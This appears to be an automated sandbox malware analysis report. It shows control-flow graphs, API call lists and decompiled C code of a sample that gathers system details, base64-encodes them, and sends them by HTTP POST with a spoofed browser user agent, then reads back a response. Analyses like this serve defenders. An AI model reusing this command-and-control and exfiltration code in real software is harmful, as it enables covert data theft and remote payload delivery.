                                                                                                                                                                                                                                                                                                        control_flow_graph 384 4004c47-4004c84 VirtualAlloc * 3 385 4004c8a-4004c8e 384->385 386 40056eb 384->386 385->386 387 4004c94-4004c98 385->387 386->386 387->386 388 4004c9e-4004cbd 387->388 390 40052a2-40052b2 388->390 391 4004cc3-4004cd0 388->391 392 40052b4-40052be 390->392 393 4005325-400534e call 4008370 390->393 394 4004cd6-4004ce3 391->394 395 400529d 391->395 392->393 396 40052c0-40052d1 392->396 410 4005354-400537f lstrlenA * 2 393->410 411 40056b8-40056e5 VirtualFree * 3 393->411 397 4004ce5-4004d17 call 4006170 * 2 call 40060c0 394->397 398 4004d1c-4004d29 394->398 396->393 402 40052d3-40052dd 396->402 397->395 400 4004d62-4004d6f 398->400 401 4004d2b-4004d5d call 4006170 * 2 call 40060c0 398->401 407 4004d71-4004da3 call 4006170 * 2 call 40060c0 400->407 408 4004da8-4004db5 400->408 401->395 402->393 406 40052df-4005322 call 4007b70 402->406 406->393 407->395 413 4004db7-4004dd8 GetCurrentThreadId call 4006170 408->413 414 4004e2c-4004e39 408->414 410->411 412 4005385-40053ca wsprintfA CryptBinaryToStringA 410->412 411->386 412->411 419 40053d0-400544e MultiByteToWideChar call 40017d0 412->419 440 4004dda-4004dfb call 4006170 call 40060c0 413->440 441 4004dfd-4004e04 413->441 420 4004e72-4004e7f 414->420 421 4004e3b-4004e6d call 4006170 * 2 call 40060c0 414->421 446 4005454-400545e 419->446 447 400569b-40056a2 419->447 432 4004ee1-4004eee 420->432 433 4004e81-4004eb4 GetSystemMetrics * 2 call 4006170 420->433 421->395 437 4004f40-4004f4d 432->437 438 4004ef0-4004f13 GlobalMemoryStatus call 4006170 432->438 456 4004eb9-4004edc call 4006170 call 40060c0 433->456 452 4004f86-4004f93 437->452 453 4004f4f-4004f81 call 4006170 * 2 call 40060c0 437->453 463 4004f18-4004f3b call 4006170 call 40060c0 438->463 455 4004e27 440->455 454 4004e06-4004e24 call 4006170 call 40060c0 441->454 441->455 461 4005470-4005477 446->461 462 4005460-400546a 446->462 447->411 460 40056a4-40056b2 VirtualFree 447->460 458 4004fd0-4004fdd 452->458 459 4004f95-4004fcb call 4006170 * 2 call 40060c0 452->459 453->395 454->455 455->395 456->395 475 4005032-400503f 458->475 476 4004fdf-400502d lstrlenA call 4006170 * 2 call 40060c0 458->476 459->395 460->411 470 400551f-4005526 461->470 472 400547d-40054af VirtualFree 461->472 462->461 462->470 463->395 470->447 481 400552c-4005540 EnterCriticalSection 470->481 486 40054c0-40054c7 472->486 482 4005041-4005091 lstrlenA call 4006170 * 2 call 40060c0 475->482 483 4005096-40050a3 475->483 476->395 494 4005542-4005573 VirtualAlloc call 4007b70 481->494 495 400558c-40055c1 VirtualAlloc 481->495 482->395 500 4005104-4005111 483->500 501 40050a5-40050ff lstrlenA call 4006170 * 2 call 40060c0 483->501 486->470 499 40054c9-40054f5 call 40017d0 486->499 517 4005578-4005587 494->517 509 40055c7-40055d8 GetTickCount 495->509 510 400568e-4005695 LeaveCriticalSection 495->510 525 40054fa-400550d 499->525 506 4005172-400517f 500->506 507 4005113-400516d lstrlenA call 4006170 * 2 call 40060c0 500->507 501->395 523 40051e0-40051ed 506->523 524 4005181-40051db lstrlenA call 4006170 * 2 call 40060c0 506->524 507->395 520 40055da-400561a call 4007b70 * 2 509->520 521 400561c-4005659 call 4007b70 * 2 509->521 510->447 517->510 567 400565c-400568b VirtualFree 520->567 521->567 529 400523f-400524c 523->529 530 40051ef-400523d lstrlenA call 4006170 * 2 call 40060c0 523->530 524->395 537 400551b 525->537 538 400550f-4005519 525->538 529->395 545 400524e-400529a call 4009b90 call 4006170 * 2 call 40060c0 529->545 530->395 537->470 538->537 548 400551d 538->548 545->395 548->486 567->510
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000), ref: 04004C49
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C60
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 04004C77
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 04005362
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(0400C5A0), ref: 04005371
                                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 04005397
                                                                                                                                                                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,00100000), ref: 040053C2
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,?,00000100), ref: 040053FD
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0400548B
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 04005533
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005552
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 04005695
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040056B2
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 040056C3
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 040056D4
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 040056E5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Free$Alloc$CriticalSectionlstrlen$BinaryByteCharCryptEnterLeaveMultiStringWidewsprintf
                                                                                                                                                                                                                                                                                                        • String ID: $pigalicapi
                                                                                                                                                                                                                                                                                                        • API String ID: 2316888505-872693435
                                                                                                                                                                                                                                                                                                        • Opcode ID: b39cc1cc03d0ade4c506769bbd2d05ca278fd1dd5e2305d6703776085187e53b
                                                                                                                                                                                                                                                                                                        • Instruction ID: bf52f896b08fb8a6114f4d2703758788ad04b625ca0fa634491eba2244ea5108
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b39cc1cc03d0ade4c506769bbd2d05ca278fd1dd5e2305d6703776085187e53b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C529DB1D00218ABFB14DB90DC84FEDB779AF49309F08C559E6097B281E775AA84CF61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 579 4001840-4001854 580 4001c95-4001c9b 579->580 581 400185a-400185e 579->581 581->580 582 4001864-4001868 581->582 582->580 583 400186e-4001872 582->583 583->580 584 4001878-400190a call 4007d20 InternetCrackUrlA 583->584 584->580 587 4001910-4001930 InternetOpenA 584->587 587->580 588 4001936-4001969 InternetConnectA 587->588 589 4001c88-4001c8f InternetCloseHandle 588->589 590 400196f-40019a7 HttpOpenRequestA 588->590 589->580 591 4001c7b-4001c82 InternetCloseHandle 590->591 592 40019ad-40019e5 wnsprintfA HttpAddRequestHeadersA 590->592 591->589 593 40019eb-40019f9 592->593 594 4001c6e-4001c75 InternetCloseHandle 592->594 595 4001a04-4001a26 InternetSetOptionA 593->595 596 40019fb-40019fe 593->596 594->591 597 4001a30-4001a75 call 4007d20 HttpSendRequestA 595->597 596->595 600 4001a7b-4001aa1 HttpQueryInfoA 597->600 601 4001c4c-4001c5f 597->601 602 4001aa3-4001abc call 4007dd0 600->602 603 4001ac9-4001b0f call 4007d20 HttpQueryInfoA 600->603 601->594 604 4001c61-4001c68 601->604 602->603 609 4001abe-4001ac7 602->609 610 4001b11-4001b2d call 4007dd0 603->610 611 4001b47-4001b6a VirtualAlloc 603->611 604->594 604->597 609->603 610->611 620 4001b2f-4001b39 610->620 613 4001b70-4001b93 611->613 614 4001c19 611->614 617 4001b99-4001bc9 InternetReadFile 613->617 615 4001c23-4001c4a InternetReadFile 614->615 615->601 615->615 618 4001bdb-4001be2 617->618 619 4001bcb-4001bd9 617->619 621 4001be4 618->621 622 4001be6-4001c11 618->622 619->618 620->611 623 4001b3b-4001b41 620->623 624 4001c17 621->624 625 4001c13 622->625 626 4001c15 622->626 623->611 624->601 625->624 626->617
                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                                                                                                                        				char _v1300;
                                                                                                                                                                                                                                                                                                        				char _v1564;
                                                                                                                                                                                                                                                                                                        				void* _v1568;
                                                                                                                                                                                                                                                                                                        				void* _v1572;
                                                                                                                                                                                                                                                                                                        				char* _v1576;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1588;
                                                                                                                                                                                                                                                                                                        				char* _v1592;
                                                                                                                                                                                                                                                                                                        				signed short _v1612;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1616;
                                                                                                                                                                                                                                                                                                        				char* _v1620;
                                                                                                                                                                                                                                                                                                        				void* _v1636;
                                                                                                                                                                                                                                                                                                        				void* _v1640;
                                                                                                                                                                                                                                                                                                        				void* _v1644;
                                                                                                                                                                                                                                                                                                        				void* _v1648;
                                                                                                                                                                                                                                                                                                        				long _v1652;
                                                                                                                                                                                                                                                                                                        				void _v1656;
                                                                                                                                                                                                                                                                                                        				void _v1916;
                                                                                                                                                                                                                                                                                                        				long _v1920;
                                                                                                                                                                                                                                                                                                        				long _v1924;
                                                                                                                                                                                                                                                                                                        				long _v1928;
                                                                                                                                                                                                                                                                                                        				void* _v1932;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v1936;
                                                                                                                                                                                                                                                                                                        				long _v1940;
                                                                                                                                                                                                                                                                                                        				long _v1944;
                                                                                                                                                                                                                                                                                                        				long _v1948;
                                                                                                                                                                                                                                                                                                        				void _v2972;
                                                                                                                                                                                                                                                                                                        				long _v2976;
                                                                                                                                                                                                                                                                                                        				int _t116;
                                                                                                                                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                                                                                                        				int _t133;
                                                                                                                                                                                                                                                                                                        				void* _t143;
                                                                                                                                                                                                                                                                                                        				long _t151;
                                                                                                                                                                                                                                                                                                        				void* _t194;
                                                                                                                                                                                                                                                                                                        				void* _t195;
                                                                                                                                                                                                                                                                                                        				void* _t196;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L37:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v1644 = 0;
                                                                                                                                                                                                                                                                                                        					_v1640 = 0;
                                                                                                                                                                                                                                                                                                        					_v1568 = 0;
                                                                                                                                                                                                                                                                                                        					_v1576 = "*/*";
                                                                                                                                                                                                                                                                                                        					_v1572 = 0;
                                                                                                                                                                                                                                                                                                        					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                                                        					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                                                        					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                                                        					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                                                        					_v1616 = 0x104;
                                                                                                                                                                                                                                                                                                        					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                                                        					_v1588 = 0x104;
                                                                                                                                                                                                                                                                                                        					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                                                        					if(_t116 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L37;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v1644 = _t117;
                                                                                                                                                                                                                                                                                                        					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                                                        						goto L37;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v1640 = _t119;
                                                                                                                                                                                                                                                                                                        					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                                                        						L36:
                                                                                                                                                                                                                                                                                                        						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                                                        						goto L37;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                                                        					_v1568 = _t123;
                                                                                                                                                                                                                                                                                                        					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                                                                                                                        						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                                                        					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                                                        					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                                                        						L34:
                                                                                                                                                                                                                                                                                                        						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                                                        					if(_a28 > 0) {
                                                                                                                                                                                                                                                                                                        						_v1656 = _a28;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                                                        					_v1652 = 1;
                                                                                                                                                                                                                                                                                                        					_v1648 = 0;
                                                                                                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                                                                                                        						_v1920 = 0x100;
                                                                                                                                                                                                                                                                                                        						E04007D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                                                        						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                                                        						_v1924 = 0;
                                                                                                                                                                                                                                                                                                        						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                                                        						if(_t133 == 0) {
                                                                                                                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                                                        							_t137 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                                                        							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                                                        							_v1936 = _t137;
                                                                                                                                                                                                                                                                                                        							if(_a32 != 0) {
                                                                                                                                                                                                                                                                                                        								_t137 = _a32;
                                                                                                                                                                                                                                                                                                        								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						E04007D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                                                        						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                                                        						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                                                        						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                                                        							_t151 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                                                        							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                                                        							_v1940 = _t151;
                                                                                                                                                                                                                                                                                                        							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                                                        								_v1928 = _v1940;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        						_v1932 = _t143;
                                                                                                                                                                                                                                                                                                        						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                                                        							_v2976 = 0;
                                                                                                                                                                                                                                                                                                        							do {
                                                                                                                                                                                                                                                                                                        								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                                                        							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                                                        							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                                                        							_v8 = 1;
                                                                                                                                                                                                                                                                                                        							_v1944 = _v1928;
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_v1948 = 0;
                                                                                                                                                                                                                                                                                                        								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                                                        								if(_a24 != 0) {
                                                                                                                                                                                                                                                                                                        									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                                                        								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                                                        								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                                                        									continue;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L29;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L32:
                                                                                                                                                                                                                                                                                                        						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                                                        					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                                                        					goto L34;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}










































                                                                                                                                                                                                                                                                                                        0x04001849
                                                                                                                                                                                                                                                                                                        0x04001854
                                                                                                                                                                                                                                                                                                        0x04001c95
                                                                                                                                                                                                                                                                                                        0x04001c9b
                                                                                                                                                                                                                                                                                                        0x04001878
                                                                                                                                                                                                                                                                                                        0x04001878
                                                                                                                                                                                                                                                                                                        0x04001882
                                                                                                                                                                                                                                                                                                        0x0400188c
                                                                                                                                                                                                                                                                                                        0x04001896
                                                                                                                                                                                                                                                                                                        0x040018a0
                                                                                                                                                                                                                                                                                                        0x040018b5
                                                                                                                                                                                                                                                                                                        0x040018ba
                                                                                                                                                                                                                                                                                                        0x040018bd
                                                                                                                                                                                                                                                                                                        0x040018cd
                                                                                                                                                                                                                                                                                                        0x040018d3
                                                                                                                                                                                                                                                                                                        0x040018e3
                                                                                                                                                                                                                                                                                                        0x040018e9
                                                                                                                                                                                                                                                                                                        0x04001902
                                                                                                                                                                                                                                                                                                        0x0400190a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400191d
                                                                                                                                                                                                                                                                                                        0x04001923
                                                                                                                                                                                                                                                                                                        0x04001930
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001956
                                                                                                                                                                                                                                                                                                        0x0400195c
                                                                                                                                                                                                                                                                                                        0x04001969
                                                                                                                                                                                                                                                                                                        0x04001c88
                                                                                                                                                                                                                                                                                                        0x04001c8f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001c8f
                                                                                                                                                                                                                                                                                                        0x04001994
                                                                                                                                                                                                                                                                                                        0x0400199a
                                                                                                                                                                                                                                                                                                        0x040019a7
                                                                                                                                                                                                                                                                                                        0x04001c7b
                                                                                                                                                                                                                                                                                                        0x04001c82
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001c82
                                                                                                                                                                                                                                                                                                        0x040019c2
                                                                                                                                                                                                                                                                                                        0x040019c8
                                                                                                                                                                                                                                                                                                        0x040019e5
                                                                                                                                                                                                                                                                                                        0x04001c6e
                                                                                                                                                                                                                                                                                                        0x04001c75
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001c75
                                                                                                                                                                                                                                                                                                        0x040019eb
                                                                                                                                                                                                                                                                                                        0x040019f9
                                                                                                                                                                                                                                                                                                        0x040019fe
                                                                                                                                                                                                                                                                                                        0x040019fe
                                                                                                                                                                                                                                                                                                        0x04001a16
                                                                                                                                                                                                                                                                                                        0x04001a1c
                                                                                                                                                                                                                                                                                                        0x04001a26
                                                                                                                                                                                                                                                                                                        0x04001a30
                                                                                                                                                                                                                                                                                                        0x04001a30
                                                                                                                                                                                                                                                                                                        0x04001a48
                                                                                                                                                                                                                                                                                                        0x04001a4d
                                                                                                                                                                                                                                                                                                        0x04001a50
                                                                                                                                                                                                                                                                                                        0x04001a6d
                                                                                                                                                                                                                                                                                                        0x04001a75
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001aa1
                                                                                                                                                                                                                                                                                                        0x04001aaa
                                                                                                                                                                                                                                                                                                        0x04001aaf
                                                                                                                                                                                                                                                                                                        0x04001ab2
                                                                                                                                                                                                                                                                                                        0x04001abc
                                                                                                                                                                                                                                                                                                        0x04001abe
                                                                                                                                                                                                                                                                                                        0x04001ac7
                                                                                                                                                                                                                                                                                                        0x04001ac7
                                                                                                                                                                                                                                                                                                        0x04001abc
                                                                                                                                                                                                                                                                                                        0x04001ad7
                                                                                                                                                                                                                                                                                                        0x04001adc
                                                                                                                                                                                                                                                                                                        0x04001adf
                                                                                                                                                                                                                                                                                                        0x04001b0f
                                                                                                                                                                                                                                                                                                        0x04001b18
                                                                                                                                                                                                                                                                                                        0x04001b1d
                                                                                                                                                                                                                                                                                                        0x04001b20
                                                                                                                                                                                                                                                                                                        0x04001b2d
                                                                                                                                                                                                                                                                                                        0x04001b41
                                                                                                                                                                                                                                                                                                        0x04001b41
                                                                                                                                                                                                                                                                                                        0x04001b2d
                                                                                                                                                                                                                                                                                                        0x04001b57
                                                                                                                                                                                                                                                                                                        0x04001b5d
                                                                                                                                                                                                                                                                                                        0x04001b6a
                                                                                                                                                                                                                                                                                                        0x04001c19
                                                                                                                                                                                                                                                                                                        0x04001c23
                                                                                                                                                                                                                                                                                                        0x04001c3d
                                                                                                                                                                                                                                                                                                        0x04001c43
                                                                                                                                                                                                                                                                                                        0x04001b70
                                                                                                                                                                                                                                                                                                        0x04001b79
                                                                                                                                                                                                                                                                                                        0x04001b84
                                                                                                                                                                                                                                                                                                        0x04001b86
                                                                                                                                                                                                                                                                                                        0x04001b93
                                                                                                                                                                                                                                                                                                        0x04001b99
                                                                                                                                                                                                                                                                                                        0x04001b99
                                                                                                                                                                                                                                                                                                        0x04001bbf
                                                                                                                                                                                                                                                                                                        0x04001bc9
                                                                                                                                                                                                                                                                                                        0x04001bd9
                                                                                                                                                                                                                                                                                                        0x04001bd9
                                                                                                                                                                                                                                                                                                        0x04001be2
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001bf2
                                                                                                                                                                                                                                                                                                        0x04001c04
                                                                                                                                                                                                                                                                                                        0x04001c11
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001c15
                                                                                                                                                                                                                                                                                                        0x04001c17
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001c17
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001be4
                                                                                                                                                                                                                                                                                                        0x04001c4c
                                                                                                                                                                                                                                                                                                        0x04001c55
                                                                                                                                                                                                                                                                                                        0x04001c5b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001a30

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
                                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
                                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
                                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 040019C2
                                                                                                                                                                                                                                                                                                        • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
                                                                                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
                                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
                                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 04001C75
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 04001C82
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 04001C8F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
                                                                                                                                                                                                                                                                                                        • POST, xrefs: 04001988
                                                                                                                                                                                                                                                                                                        • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
                                                                                                                                                                                                                                                                                                        • <, xrefs: 040018BD
                                                                                                                                                                                                                                                                                                        • 0u, xrefs: 040019EB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
